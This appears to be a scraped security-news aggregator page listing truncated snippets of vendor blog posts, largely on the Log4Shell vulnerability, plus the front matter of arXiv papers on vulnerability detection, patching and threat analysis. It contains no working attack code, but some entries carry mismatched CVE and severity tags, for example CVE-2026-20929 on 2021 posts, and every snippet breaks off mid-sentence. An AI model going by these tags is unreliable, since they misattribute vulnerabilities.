e
f
g
h
i
j
k
l
m
n
o
p
q
r
s
t
u
v
w
x
z
Filter Category
Application resiliency refers to the tools and principles that ensure critical systems remain functional despite disruptions.
AIDR secures the full AI‑native attack surface and bridges the gap between enterprises operations and how adversaries attack.
AI anomaly detection employs the use of AI/ML algorithms and models to identify unusual behaviors, events, or patterns that diverge from normal or expected baselines and is crucial for maintaining the integrity of critical information a
Trendmicro
What Is Apache Log4J (Log4Shell) Vulnerability?
blogs_trendmicro
What Is Apache Log4J (Log4Shell) Vulnerability?
Bridge threat protection and cyber risk management
Browse Trend-approved partner solutions for our leading platform
Your environment, your choice – deploy Trend Vision One™ as SaaS or customer hosted
The leader in Exposure Management – turning cyber risk visibility into decisive, proactive security
Stop adversaries with unrivaled visibility, powered by the intelligence of XDR, Agentic SIEM, and Agentic SOAR to leave attackers with nowhere left to hide
The most trusted cloud security platform for developers, security teams, and businesses
Extend visibility to the cloud and streamline SOC investigations
Secure your data centre, cloud, and containers without compromising performance by leveraging a cloud security platform with CNAPP capabilities
Simplify security for your cloud-native
Greynoiseio
Observed in the Wild: F5 BIG-IP CVE-2022-1388
blogs_greynoiseio·CVSS 9.8
[CRITICAL] Observed in the Wild: F5 BIG-IP CVE-2022-1388
CVE Disclosure Early Warning Get an early warning when traffic spikes indicate a high likelihood of new disclosures
Compromised Asset Detection Find out immediately if an asset communicates with a malicious IP address
Vulnerability Prioritization Get real-time insight into active exploitation trends to better understand risk and severity
SOC Efficiency Filter out noisy, low priority and false-positive alerts from mass internet scanners
Incident Investigation Add context to incidents to speed the determinations of scope and timelines
Threat Hunting Quickly identify anomalous behavior and enrich your threat hunting campaigns
Why GreyNoise
CVE Disclosure Early Warning Get an early warning when traffic spikes indicate a high likelihood of new disclosures
Compromised Asset Detection Fin
Zscaler
ThreatLabZ December 2021 Report: Holiday shoppers targeted, Log4j hits Apache installs, Cloud (In)Security, and DarkHotel resurfaces | CXO Revolutionaries
blogs_zscaler
ThreatLabZ December 2021 Report: Holiday shoppers targeted, Log4j hits Apache installs, Cloud (In)Security, and DarkHotel resurfaces | CXO Revolutionaries
## ThreatLabZ December 2021 Report: Holiday shoppers targeted, Log4j hits Apache installs, Cloud (In)Security, and DarkHotel resurfaces
Deepen Desai
Contributor
Zscaler
## Dec 22, 2021
Get the scoop on the return of the South Korea-based DarkHotel APT group, malicious campaigns targeting online holiday shoppers, The 2021 State of Cloud (In)Security, and, of course, the Apache Log4j vulnerability.
ThreatLabZ, the embedded research team at Zscaler, continues to fire on all cylinders as we come up to the end of the year.We’ve recently seen a resumption of threat activity from the South Korea-based DarkHotel APT group and identified malicious campaigns targeting online holiday shopping. And we’ve been actively tracking exploits and remote code execution risks associated with the well-pub
Greynoiseio
How to Defend Against Emerging Threats with GreyNoise Investigate 4.0
blogs_greynoiseio
How to Defend Against Emerging Threats with GreyNoise Investigate 4.0
CVE Disclosure Early Warning Get an early warning when traffic spikes indicate a high likelihood of new disclosures
Compromised Asset Detection Find out immediately if an asset communicates with a malicious IP address
Vulnerability Prioritization Get real-time insight into active exploitation trends to better understand risk and severity
SOC Efficiency Filter out noisy, low priority and false-positive alerts from mass internet scanners
Incident Investigation Add context to incidents to speed the determinations of scope and timelines
Threat Hunting Quickly identify anomalous behavior and enrich your threat hunting campaigns
Why GreyNoise
CVE Disclosure Early Warning Get an early warning when traffic spikes indicate a high likelihood of new disclosures
Compromised Asset Detection Fin
Sentinelone
TellYouThePass
blogs_sentinelone·CVSS 10.0
[CRITICAL] TellYouThePass
# TellYouThePass Ransomware: In-Depth Analysis, Detection, and Mitigation
## What Is TellYouThePass Ransomware?
TellYouThePass is a commodity-level ransomware that emerged in 2019. This ransomware family saw a resurgence in parallel with recent exploitation of Apache (Log4j) vulnerabilities. Currently, TellYouThePass ransomware does not host a public blog nor a repository of victims and their respective data.
## What Does TellYouThePass Ransomware Target?
TellYouThePass is low-sophistication ransomware that is used to target businesses as well as private individuals. Increased targeting of specific vulnerabilities such as CVE-2021-44228 has been observed.
## How Does TellYouThePass Ransomware Work?
Modern TellYouThePass ransomware payloads are written in Go. The ransomware uses a com
Crowdstrike
December 2021 Patch Tuesday: Updates and Analysis
blogs_crowdstrike·CVSS 7.5
CVE-2026-20929 [HIGH] December 2021 Patch Tuesday: Updates and Analysis
STARDUST CHOLLIMA Likely Compromises Axios npm Package Apr 01, 2026
Falcon for IT Supports Windows Secure Boot Certificate Lifecycle Management Apr 01, 2026
Detecting CVE-2026-20929: Kerberos Authentication Relay via CNAME Abuse Mar 31, 2026
How Charlotte AI AgentWorks Fuels Security's Agentic Ecosystem Mar 25, 2026
STARDUST CHOLLIMA Likely Compromises Axios npm Package Apr 01, 2026
Falcon for IT Supports Windows Secure Boot Certificate Lifecycle Management Apr 01, 2026
Detecting CVE-2026-20929: Kerberos Authentication Relay via CNAME Abuse Mar 31, 2026
How Charlotte AI AgentWorks Fuels Security's Agentic Ecosystem Mar 25, 2026
Video Highlights the 4 Key Steps to Successful Incident Response Dec 02, 2019
Helping Non-Security Stakeholders Understand ATT&CK in 10 Minutes or Less [VI
Crowdstrike
What Is a Cyberattack?
blogs_crowdstrike
What Is a Cyberattack?
Upcoming events
Conference
CrowdTour
Find a city near you
Your Cart
Added to Cart
There's nothing in your cart
per endpoint / per year
per endpoint / per month
Login
Login
Experienced a breach?
Contact us
## Cyberattack Definition
A cyberattack is an attempt by cybercriminals, hackers or other digital adversaries to access a computer network or system, usually for the purpose of altering, stealing, destroying or exposing information.
Cyberattacks can target a wide range of victims from individual users to enterprises or even governments. When targeting businesses or other organizations, the hacker’s goal is usually to access sensitive and valuable company resources, such as intellectual property (IP), customer data or payment details.
In recent years, cyberattacks have be
Greynoiseio
Log4j Analysis: What to Do
blogs_greynoiseio·CVSS 10.0
[CRITICAL] Log4j Analysis: What to Do
CVE Disclosure Early Warning Get an early warning when traffic spikes indicate a high likelihood of new disclosures
Compromised Asset Detection Find out immediately if an asset communicates with a malicious IP address
Vulnerability Prioritization Get real-time insight into active exploitation trends to better understand risk and severity
SOC Efficiency Filter out noisy, low priority and false-positive alerts from mass internet scanners
Incident Investigation Add context to incidents to speed the determinations of scope and timelines
Threat Hunting Quickly identify anomalous behavior and enrich your threat hunting campaigns
Why GreyNoise
CVE Disclosure Early Warning Get an early warning when traffic spikes indicate a high likelihood of new disclosures
Compromised Asset Detection Fin
Crowdstrike
What is the Log4j/Log4Shell Vulnerability
blogs_crowdstrike·CVSS 10.0
[CRITICAL] What is the Log4j/Log4Shell Vulnerability
Upcoming events
Conference
CrowdTour
Find a city near you
Your Cart
Added to Cart
There's nothing in your cart
per endpoint / per year
per endpoint / per month
Login
Login
Experienced a breach?
Contact us
Log4j is a Java-based logging library maintained by the Apache Software Foundation. It’s used across countless enterprise applications, frameworks, and cloud services to log system events, debug messages, and application errors.
Its flexibility and ease of integration made it the default logging framework for many Java applications, and it was often bundled deep within software stacks via transitive dependencies. That ubiquity turned into a critical liability when a major security flaw was discovered in late 2021.
## What is Log4Shell?
Log4Shell is a critical zero-day vu
Crowdstrike
Java Logging Guide: The Basics
blogs_crowdstrike
Java Logging Guide: The Basics
Upcoming events
Conference
CrowdTour
Find a city near you
Summit
Day Zero 2026
Las Vegas, NV
Login
Your Cart
Added to Cart
There's nothing in your cart
per endpoint / per year
per endpoint / per month
Login
Experienced a breach?
Blog
Contact us
Careers
Latest Innovations
Logging helps you understand how an application performs or what went wrong when something fails. This information can be critical for debugging and auditing purposes. Logs maintain a trail of every event during a program’s execution, making those records available for later analysis.
However, effective logging does not happen automatically. Application developers need to ensure an application is systematically logging important details in an easy-to-process format.
The most rudimentary approach to log
Crowdstrike
Vulnerabilidades y exposiciones comunes (CVE)
blogs_crowdstrike
Vulnerabilidades y exposiciones comunes (CVE)
Próximos eventos
Conferencia
CrowdTour
Encuentra la ciudad más cercana
Inicio de sesión
Tu cesta
Añadido a la cesta
Tu cesta está vacía
por endpoint / por año
al mes por endpoint
Inicio de sesión
¿Has sufrido una brecha de seguridad?
Contacto
En la actualidad, las empresas corren más riesgo que nunca de sufrir ataques de ciberseguridad y brechas de datos. El robo de datos y los ataques de ransomware a partir de vulnerabilidades y exposiciones pueden causar millones de dólares en daños a las corporaciones.
Pero, ¿qué son exactamente las vulnerabilidades y las exposiciones? Podemos describir una vulnerabilidad como un error o punto débil dentro de un sistema informático o software que puede conceder niveles no deseados de acceso a un usuario . Las vulnerabilidades permiten a lo
Recorded Future
Log4Shell: How It’s Exploited and Mitigating Damage
blogs_recorded_future·CVSS 10.0
CVE-2021-44228 [CRITICAL] Log4Shell: How It’s Exploited and Mitigating Damage
# Log4Shell: How It’s Being Exploited and How to Mitigate Damage
Join us this Wednesday, December 15 at 11AM ET for an update on the evolving situation with Log4Shell. The briefing will be followed by a live Q&A. Click here to register.
CVE-2021-44228 is a critical vulnerability affecting Log4j, a widely used, open-source logging library written in Java. The vulnerability in Log4j will parse a specially crafted log message insecurely, causing it to execute remote code with the full privileges of the main program. The exploit has been dubbed Log4Shell.
On December 9, 2021, Chen Zhaojun of the Alibaba Cloud Security Team discovered and released sample code for a major remote code execution vulnerability in Apache's Log4j technology. In a now-deleted social media post, Zhaojun shared a pro
Crowdstrike
Hypervisor Jackpotting, Part 3: Lack of Antivirus Support Opens the Door to Adversaries
blogs_crowdstrike·CVSS 7.5
CVE-2026-20929 [HIGH] Hypervisor Jackpotting, Part 3: Lack of Antivirus Support Opens the Door to Adversaries
How CrowdStrike is Accelerating Exposure Evaluation as Adversaries Gain Speed Apr 06, 2026
STARDUST CHOLLIMA Likely Compromises Axios npm Package Apr 01, 2026
Falcon for IT Supports Windows Secure Boot Certificate Lifecycle Management Apr 01, 2026
Detecting CVE-2026-20929: Kerberos Authentication Relay via CNAME Abuse Mar 31, 2026
How CrowdStrike is Accelerating Exposure Evaluation as Adversaries Gain Speed Apr 06, 2026
STARDUST CHOLLIMA Likely Compromises Axios npm Package Apr 01, 2026
Falcon for IT Supports Windows Secure Boot Certificate Lifecycle Management Apr 01, 2026
Detecting CVE-2026-20929: Kerberos Authentication Relay via CNAME Abuse Mar 31, 2026
Video Highlights the 4 Key Steps to Successful Incident Response Dec 02, 2019
Helping Non-Security Stakeholders Understand AT
Zscaler
ThreatLabZ February 2022 Report: Molerats APT attacks, Formbook rebrands as Xloader, and repelling Log4j threats with Zero Trust | CXO Revolutionaries
blogs_zscaler
ThreatLabZ February 2022 Report: Molerats APT attacks, Formbook rebrands as Xloader, and repelling Log4j threats with Zero Trust | CXO Revolutionaries
EDITOR'S PICK
## ThreatLabZ February 2022 Report: Molerats APT attacks, Formbook rebrands as Xloader, and repelling Log4j threats with Zero Trust
Deepen Desai
Contributor
Zscaler
## Feb 11, 2022
Formbook credential-stealing malware rebrands as Xloader, Molerats APT aims at Middle East politics, and Zscaler continues to repel the Log4j zero-day threat with zero trust.
This past month, the Zscaler ThreatLabZ security research team has charted new espionage activity from the Molerats APT group, tracked the Xloader credential-stealing malware, and continued to apply zero trust countermeasures against Log4j zero-day exploits.
## Molerats APT group takes aim at Middle East political targets
In December 2021, ThreatLabZ identified a new campaign involving macro-based Microsoft Office fil
Greynoiseio
KEV'd: CVE-2021-45046, CVE-2023-21839, and CVE-2023-1389
blogs_greynoiseio·CVSS 9.0
[CRITICAL] KEV'd: CVE-2021-45046, CVE-2023-21839, and CVE-2023-1389
CVE Disclosure Early Warning Get an early warning when traffic spikes indicate a high likelihood of new disclosures
Compromised Asset Detection Find out immediately if an asset communicates with a malicious IP address
Vulnerability Prioritization Get real-time insight into active exploitation trends to better understand risk and severity
SOC Efficiency Filter out noisy, low priority and false-positive alerts from mass internet scanners
Incident Investigation Add context to incidents to speed the determinations of scope and timelines
Threat Hunting Quickly identify anomalous behavior and enrich your threat hunting campaigns
Why GreyNoise
CVE Disclosure Early Warning Get an early warning when traffic spikes indicate a high likelihood of new disclosures
Compromised Asset Detection Fin
Huntress
What is a Vulnerability in Cybersecurity? Types & Prevention | Huntress
blogs_huntress
What is a Vulnerability in Cybersecurity? Types & Prevention | Huntress
## Definition of a vulnerability in cybersecurity
At its core, a vulnerability is a weakness. The National Institute of Standards and Technology (NIST) defines it as “a weakness in an information system, system security procedures, internal controls, or implementation that could be exploited or triggered by a threat source.”
Think of it as the unlocked doors or unguarded windows in your organization's defenses. They are not inherently an issue until someone finds them and decides to exploit them for malicious intent. These weaknesses can stem from breakdowns in code, configuration errors, outdated software, or even human mistakes.
## Key terminology
Before we proceed, here are some commonly interrelated cybersecurity terms:
Vulnerability : A weakness that can be exploited.
Exploit :
Crowdstrike
What is the Log4j/Log4Shell Vulnerability
blogs_crowdstrike·CVSS 10.0
[CRITICAL] What is the Log4j/Log4Shell Vulnerability
Upcoming events
Conference
CrowdTour
Find a city near you
Summit
Day Zero 2026
Las Vegas, NV
Login
Your Cart
Added to Cart
There's nothing in your cart
per endpoint / per year
per endpoint / per month
Login
Experienced a breach?
Blog
Contact us
Careers
Latest Innovations
Log4j is a Java-based logging library maintained by the Apache Software Foundation. It’s used across countless enterprise applications, frameworks, and cloud services to log system events, debug messages, and application errors.
Its flexibility and ease of integration made it the default logging framework for many Java applications, and it was often bundled deep within software stacks via transitive dependencies. That ubiquity turned into a critical liability when a major security flaw was discovered in
Crowdstrike
Log4j2 Vulnerability "Log4Shell" (CVE-2021-44228)
blogs_crowdstrike·CVSS 10.0
CVE-2026-20929 [CRITICAL] Log4j2 Vulnerability "Log4Shell" (CVE-2021-44228)
STARDUST CHOLLIMA Likely Compromises Axios npm Package Apr 01, 2026
Falcon for IT Supports Windows Secure Boot Certificate Lifecycle Management Apr 01, 2026
Detecting CVE-2026-20929: Kerberos Authentication Relay via CNAME Abuse Mar 31, 2026
How Charlotte AI AgentWorks Fuels Security's Agentic Ecosystem Mar 25, 2026
STARDUST CHOLLIMA Likely Compromises Axios npm Package Apr 01, 2026
Falcon for IT Supports Windows Secure Boot Certificate Lifecycle Management Apr 01, 2026
Detecting CVE-2026-20929: Kerberos Authentication Relay via CNAME Abuse Mar 31, 2026
How Charlotte AI AgentWorks Fuels Security's Agentic Ecosystem Mar 25, 2026
Video Highlights the 4 Key Steps to Successful Incident Response Dec 02, 2019
Helping Non-Security Stakeholders Understand ATT&CK in 10 Minutes or Less [VI
arXiv
A Systematic Study of LLM-Based Architectures for Automated Patching
arxiv_fulltext·2026-03-01
A Systematic Study of LLM-Based Architectures for Automated Patching
A Systematic Study of LLM-Based Architectures for Automated Patching
Qingxiao Xu, Ze Sheng, Zhicheng Chen, Jeff Huang
Texas A&M University
College Station
USA
qingxiao,zesheng,chenzc2001,[email protected]
## Abstract
Large language models (LLMs) have shown promise for automated patching of software security vulnerabilities, but their effectiveness depends strongly on how they are integrated into patching systems. While prior work explores prompting strategies and individual agent designs, the field lacks a systematic comparison of patching architectures. In this paper, we present a controlled evaluation of four LLM-based patching paradigms, including fixed workflow, single-agent system, multi-agent system, and general-purpose code agents, using a unified benchmark and evaluation framework
arXiv
Detecting PowerShell-based Fileless Cryptojacking Attacks Using Machine Learning
arxiv_fulltext·2026-02-20
Detecting PowerShell-based Fileless Cryptojacking Attacks Using Machine Learning
frontmatter
Detecting PowerShell-based Fileless Cryptojacking Attacks Using Machine Learning
[uc-it]Said Varlioglucor1
[uc-it]Nelly Elsayed
[uc-it]Murat Ozer
[uc-it]Zag ElSayed
[uc-it,uc-ece]John M. Emmert
[uc-it]
organization=School of Information Technology,
organization=University of Cincinnati,
city=Cincinnati,
state=OH,
country=USA
[uc-ece]
organization=Department of Electrical and Computer Engineering,
organization=University of Cincinnati,
city=Cincinnati,
state=OH,
country=USA
[cor1]Corresponding author
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
## Abstract
With the emergence of remote code execution (RCE) vulnerabilities in ubiquitous libraries and advanced social engineering techniques, threat actors have
arXiv
Uncovering Vulnerabilities of LLM-Assisted Cyber Threat Intelligence
arxiv_fulltext·2026-02-06
Uncovering Vulnerabilities of LLM-Assisted Cyber Threat Intelligence
Uncovering Vulnerabilities of LLM-Assisted Cyber Threat Intelligence
Yuqiao Meng^1, Luoxi Tang^1, Feiyang Yu^2, Jinyuan Jia^3, Guanhua Yan^1, Ping Yang^1, Zhaohan Xi^1
^1Binghamton University
^2Duke University
^3Pennsylvania State University
\ymeng15, ltang24, ghyan, pyang, zxi1\@binghamton.edu
[email protected], [email protected]
## Abstract
Large language models (LLMs) are increasingly used to help security analysts manage the surge of cyber threats, automating tasks from vulnerability assessment to incident response. Yet in operational CTI workflows, reliability gaps remain substantial. Existing explanations often point to generic model issues (e.g., hallucination), but we argue the dominant bottleneck is the threat landscape itself: CTI is heterogeneous, volatile, and fragmented. Under
arXiv
Focus on What Matters: Fisher-Guided Adaptive Multimodal Fusion for Vulnerability Detection
arxiv_fulltext·2026-01-20
Focus on What Matters: Fisher-Guided Adaptive Multimodal Fusion for Vulnerability Detection
Focus on What Matters: Fisher-Guided Adaptive Multimodal Fusion for Vulnerability Detection
Yun Bian
Affiliated with University of Chinese Academy of Sciences, Beijing, China.
Chengdu Institute of Computer Applications, Chinese Academy of Sciences
Chengdu
China
[email protected]
Yi Chen
[1]
Chengdu Institute of Computer Applications, Chinese Academy of Sciences
Chengdu
China
[email protected]
HaiQuan Wang
[1]
Chengdu Institute of Computer Applications, Chinese Academy of Sciences
Chengdu
China
[email protected]
Shihao Li
[1]
Chengdu Institute of Computer Applications, Chinese Academy of Sciences
Chengdu
China
[email protected]
Zhe Cui
[1]
Corresponding author.
Chengdu Institute of Computer Applications, Chinese Academy of Sciences
Chengdu
Chi
arXiv
A Survey on Mapping Digital Systems with Bill of Materials: Development, Practices, and Challenges
arxiv_fulltext·2026-01-16
A Survey on Mapping Digital Systems with Bill of Materials: Development, Practices, and Challenges
[Mapping Digital Systems with the Bill of Materials]A Survey on Mapping Digital Systems with Bill of Materials: Development, Practices, and Challenges
Shuai Zhang
0009-0009-1288-5460
University of New South Wales
Sydney
NSW
Australia
[email protected]
Minzhao Lyu
0000-0001-8677-248X
University of New South Wales
Sydney
NSW
Australia
[email protected]
Hassan Habibi Gharakheili
0000-0002-9333-7635
University of New South Wales
Sydney
NSW
Australia
[email protected]
## Abstract
Modern digital ecosystems, spanning software, hardware, learning models, datasets, and cryptographic products, continue to grow in complexity, making it difficult for organizations to understand and manage component dependencies. Bills of Materials (BOMs) have emerged as a structured
arXiv
A Longitudinal Measurement Study of Log4Shell Exploitation from an Active Network Telescope
arxiv_fulltext·2026-01-07
A Longitudinal Measurement Study of Log4Shell Exploitation from an Active Network Telescope
A Longitudinal Measurement Study of Log4Shell Exploitation from an Active Network Telescope
Aakash Singh^ ,
Kuldeep Singh Yadav^ , V. Anil Kumar^**Corresponding Author, Equal Contribution,
Member, IEEE,
Samiran Ghosh, Pranita Baro, Graduate Student Member, IEEE,
Basavala Bhanu Prasanth
Aakash Singh, Kuldeep Singh Yadav, V. Anil Kumar, Samiran Ghosh, Pranita Baro, and Basavala Bhanu Prasanth are with the Big Data Research and Supercomputing Division, CSIR Fourth Paradigm Institute (CSIR-4PI), Bengaluru, India. (e-mail: [email protected], [email protected], [email protected], [email protected], [email protected], [email protected]).
IEEE Transactions on Network and Service Management
Shell et al.: A Sample Article Using IEEEtran.cls for IEEE Journals
## Abst
arXiv
An Adaptive Multi-Layered Honeynet Architecture for Threat Behavior Analysis via Deep Learning
arxiv_fulltext·2025-12-08
An Adaptive Multi-Layered Honeynet Architecture for Threat Behavior Analysis via Deep Learning
An Adaptive Multi-Layered Honeynet Architecture for Threat Behavior Analysis via Deep Learning
[scale=0.06]orcid.pdf1mmLukas Johannes Möller1,
Member, IEEE
[1]Georgia Institute of Technology Atlanta, United States of America (e-mail: [email protected]
This work was supported in part by the Federal Office for Information Security - BSI
L J Möller: An Adaptive Multi-Layered Honeynet Architecture for Threat Behavior Analysis via Machine Learning
L J Möller: An Adaptive Multi-Layered Honeynet Architecture for Threat Behavior Analysis via Machine Learning
## Abstract
The escalating sophistication and variety of cyber threats have rendered static honeypots inadequate, necessitating adaptive, intelligence-driven deception. In this work, ADLAH is introduced: an Adaptive Deep Learning Anomaly
arXiv
The Road of Adaptive AI for Precision in Cybersecurity
arxiv_fulltext·2025-12-05
The Road of Adaptive AI for Precision in Cybersecurity
## Abstract
Cybersecurity's evolving complexity presents unique challenges and opportunities for AI research and practice. This paper shares key lessons and insights from designing, building, and operating production-grade GenAI pipelines in cybersecurity, with a focus on the continual adaptation required to keep pace with ever-shifting knowledge bases, tooling, and threats.
Our goal is to provide an actionable perspective for AI practitioners and industry stakeholders navigating the frontier of GenAI for cybersecurity, with particular attention to how different adaptation mechanisms complement each other in end-to-end systems.
We present practical guidance derived from real-world deployments, propose best practices for leveraging retrieval- and model-level adaptation, and highlight ope
arXiv
A Comprehensive Study on the Impact of Vulnerable Dependencies on Open-Source Software
arxiv_fulltext·2025-12-03
A Comprehensive Study on the Impact of Vulnerable Dependencies on Open-Source Software
A Comprehensive Study on the Impact of Vulnerable Dependencies on Open-Source Software
Shree Hari Bittugondanahalli Indra Kumar1,
Lília Rodrigues Sampaio2,
Andr\'e Martin1,
Andrey Brito2,
Christof Fetzer1
1Technische Universit\"at Dresden, Dresden, Germany\ : [email protected] / [email protected] / [email protected]
2Universidade Federal de Campina Grande, Campina Grande, Brazil
Email: [email protected] / [email protected]
## Abstract
Open-source libraries are widely used by software developers to speed up the development of products, however, they can introduce security vulnerabilities, leading to incidents like Log4Shell. With the expanding usage of open-source libraries, it becomes even more imperative to comprehend and address these de
arXiv
NatGVD: Natural Adversarial Example Attack towards Graph-based Vulnerability Detection
arxiv_fulltext·2025-10-06
NatGVD: Natural Adversarial Example Attack towards Graph-based Vulnerability Detection
: Natural Adversarial Example Attack towards Graph-based Vulnerability Detection
Avilash Rath^
, Weiliang Qi^ , Youpeng Li, Xinda Wang
The University of Texas at Dallas
^ The first two authors contributed equally to this work.
avilash.rath,
weiliang.qi, youpeng.li, [email protected]
A. Rath, W. Qi, Y. Li, and X. Wang
## Abstract
Graph-based models learn rich code graph structural information and present superior performance
on various code analysis tasks.
However, the robustness of these models against adversarial example attacks in the context of vulnerability detection remains an open question. This paper proposes , a novel attack methodology that generates natural adversarial vulnerable code to circumvent GNN-based and graph-aware transformer-based vulnerability detectors.
arXiv
Real-VulLLM: An LLM Based Assessment Framework in the Wild
arxiv_fulltext·2025-10-05
Real-VulLLM: An LLM Based Assessment Framework in the Wild
Real-VulLLM: An LLM Based Assessment Framework in the Wild
Rijha Safdar, Danyail Mateen, Syed Taha Ali and Wajahat Hussain
R. Safdar, S.T. Ali and W. Hussain are with School of Electrical Engineering and Computer Science, National University of Sciences and Technology, Islamabad, Pakistan, 44000. e-mail: [email protected] ,e-mail: [email protected], email:[email protected]
D. Mateen is with the Department
Computer Science, Fast University, Islamabad,
Pakistan, 44000
## Abstract
Artificial Intelligence (AI) and more specifically Large Language Models (LLMs) have demonstrated exceptional progress in multiple areas including software engineering, however, their capability for vulnerability detection in the wild scenario and its corresponding reasoning remains
arXiv
Design and Development of an Intelligent LLM-based LDAP Honeypot
arxiv_fulltext·2025-09-20
Design and Development of an Intelligent LLM-based LDAP Honeypot
Design and Development of an Intelligent LLM-based LDAP Honeypot
Javier Jiménez Román
\ Carlos III de Madrid
Avda de la Universidad 30
Legan\'es, Madrid, Spain
Florina Almenares-Mendoza
Universidad Carlos III de Madrid
Avda de la Universidad 30
Legan\'es, Madrid, Spain
[email protected],
Alfonso S\'anchez-Maci\'an
Universidad Carlos III de Madrid
Avda de la Universidad 30
Legan\'es, Madrid, Spain
[email protected],
## Abstract
Cybersecurity threats continue to increase, with a growing number of previously unknown attacks each year targeting both large corporations and smaller entities. This scenario demands the implementation of advanced security measures, not only to mitigate damage but also to anticipate emerging attack trends. In this context, deception tools have beco
arXiv
xOffense: An AI-driven autonomous penetration testing framework with offensive knowledge-enhanced LLMs and multi agent systems
arxiv_fulltext·2025-09-16
xOffense: An AI-driven autonomous penetration testing framework with offensive knowledge-enhanced LLMs and multi agent systems
1
.001
xOffense: An AI-driven autonomous penetration testing framework with offensive knowledge-enhanced LLMs and multi agent systems
[1]organization=Information Security Lab, University of Information Technology,
city=Ho Chi Minh City,
country=Vietnam
[2]organization=Vietnam National University Ho Chi Minh City,
city=Ho Chi Minh City,
country=Vietnam
[1,2]Phung Duc Luong 0009-0004-6057-5313
[email protected]
[1,2]Le Tran Gia Bao 0009-0000-8911-5741
[email protected]
[1,2]Nguyen Vu Khai Tam
0009-0008-1715-4213
[email protected]
[1,2]Dong Huu Nguyen Khoa 0009-0005-9526-140X
[email protected]
[1,2]Nguyen Huu Quyen 0000-0002-0065-9919
[email protected]
[1,2]Van-Hau Pham 0000-0003-3147-3356
[email protected]
[1,2]Phan The Duy 0000-0002-5945-3712cor1
[email protected]
arXiv
Incident Response Planning Using a Lightweight Large Language Model with Reduced Hallucination
arxiv_fulltext·2025-08-07
Incident Response Planning Using a Lightweight Large Language Model with Reduced Hallucination
MyBSTcontrol
Incident Response Planning Using a Lightweight Large Language Model with Reduced Hallucination
Kim Hammar2, Tansu Alpcan2, and Emil C. Lupu3
2
Department of Electrical and Electronic Engineering, University of Melbourne, Australia
3
Department of Computing, Imperial College London, United Kingdom
Email: \kim.hammar,tansu.alpcan\@unimelb.edu.au, and [email protected]
## Abstract
Timely and effective incident response is key to managing the growing frequency of cyberattacks. However, identifying the right response actions for complex systems is a major technical challenge. A promising approach to mitigate this challenge is to use the security knowledge embedded in large language models (llms) to assist security operators during incident handling. Recent research has
arXiv
Attack Effect Model based Malicious Behavior Detection
arxiv_fulltext·2025-06-05
Attack Effect Model based Malicious Behavior Detection
Attack Effect Model based Malicious Behavior Detection
Limin Wang, Lei Bu^( ), Muzimiao Zhang, Shihong Cang, Kai Ye
State Key Laboratory of Novel Software Techniques, Nanjing University, Nanjing, Jiangsu 210023, China
Email: [email protected],
-8.8mm
\@IEEEpubidpullup6.5
Network and Distributed System Security (NDSS) Symposium 2025
24-28 February 2025, San Diego, CA, USA
ISBN 979-8-9894372-8-3
https://dx.doi.org/10.14722/ndss.2025.[23|24]xxxx
www.ndss-symposium.org
[ ]
## Abstract
Traditional security detection methods struggle to keep pace with the rapidly evolving landscape of cyber threats targeting critical infrastructure and sensitive data. These approaches suffer from three critical limitations: non-security-oriented system activity data collection that fails to capture c
arXiv
An In-kernel Forensics Engine for Investigating Evasive Attacks
arxiv_fulltext·2025-05-18
An In-kernel Forensics Engine for Investigating Evasive Attacks
An In-kernel Forensics Engine for Investigating Evasive Attacks
Javad Zandi
Florida International University
Lalchandra Rampersaud
Florida International University
Amin Kharraz
Florida International University
[@twocolumnfalse
## Abstract
Over the years, adversarial attempts against critical services have become more effective and sophisticated in launching
low-profile attacks.
This trend has always been concerning. However, an even more alarming trend is the increasing difficulty of collecting relevant evidence about these attacks and the involved threat actors in the early stages before significant damage is done.
This issue puts defenders at a significant disadvantage, as it becomes exceedingly difficult to understand the attack details and formulate an appropriate response.
D
arXiv
APPATCH: Automated Adaptive Prompting Large Language Models for Real-World Software Vulnerability Patching
arxiv_fulltext·2025-04-02
APPATCH: Automated Adaptive Prompting Large Language Models for Real-World Software Vulnerability Patching
:
Automated Adaptive Prompting Large Language Models for Real-World Software Vulnerability Patching
[1] Yu Nong
[2] Haoran Yang
[3] Long Cheng
[1] Hongxin Hu
[1Haipeng Cai is the corresponding author.] Haipeng Cai
[1]University at Buffalo,
[2]Washington State University,
[3]Clemson University
[ ]1.0em
^1\yunong,hongxinh,haipengc\@buffalo.edu,
^[email protected],
^[email protected]
## Abstract
Timely and effective vulnerability patching is essential for cybersecurity defense, for which various approaches have been proposed yet still struggle to generate valid and correct patches for real-world vulnerabilities.
In this paper, we leverage the power and merits of pre-trained language language models (LLMs) to enable automated vulnerability patching using no test input/exploit evid
arXiv
Knowledge Transfer from LLMs to Provenance Analysis: A Semantic-Augmented Method for APT Detection
arxiv_fulltext·2025-03-25
Knowledge Transfer from LLMs to Provenance Analysis: A Semantic-Augmented Method for APT Detection
*
-
[-12pt][r]SAND2025-03552C
[Knowledge Transfer from LLMs to Provenance Analysis: A Semantic-Augmented APT Detection]Knowledge Transfer from LLMs to Provenance Analysis:\ Semantic-Augmented Method for APT Detection
Fei Zuo
[email protected]
University of Central Oklahoma
Edmond
Oklahoma
USA
Junghwan Rhee
[email protected]
University of Central Oklahoma
Edmond
Oklahoma
USA
Yung Ryn Choe
[email protected]
Sandia National Laboratories
Livermore
California
USA
comment
Shuaibing Lu
[email protected]
Beijing University of Techonology
Beijing
China
Haotian Chi
[email protected]
Shanxi University
Taiyuan
China
comment
## Abstract
Advanced Persistent Threats (APTs) have caused significant losses across a wide range of sectors, including the theft of sensitive data and harm to system i
arXiv
LLMs in Software Security: A Survey of Vulnerability Detection Techniques and Insights
arxiv_fulltext·2025-02-12
LLMs in Software Security: A Survey of Vulnerability Detection Techniques and Insights
LLMs in Software Security: A Survey of Vulnerability Detection Techniques and Insights
Ze Sheng
Texas A&M University
College Station
USA
[email protected]
Zhicheng Chen
Texas A&M University
College Station
USA
[email protected]
Shuning Gu
Texas A&M University
College Station
USA
[email protected]
Heqing Huang
City University of Hong Kong
Hong Kong
China
[email protected]
Guofei Gu
Texas A&M University
College Station
USA
[email protected]
Jeff Huang
Texas A&M University
College Station
USA
[email protected]
Sheng et al.
## Abstract
Large Language Models (LLMs) are emerging as transformative tools for software vulnerability detection. Traditional methods, including static and dynamic analysis, face limitations in efficiency, false-positive rates, and scalability with modern
arXiv
A Systematic Literature Review on Automated Exploit and Security Test Generation
arxiv_fulltext·2025-02-07
A Systematic Literature Review on Automated Exploit and Security Test Generation
A Systematic Literature Review on Automated Exploit\ Security Test Generation
Quang-Cuong Bui
0000-0001-6072-9213
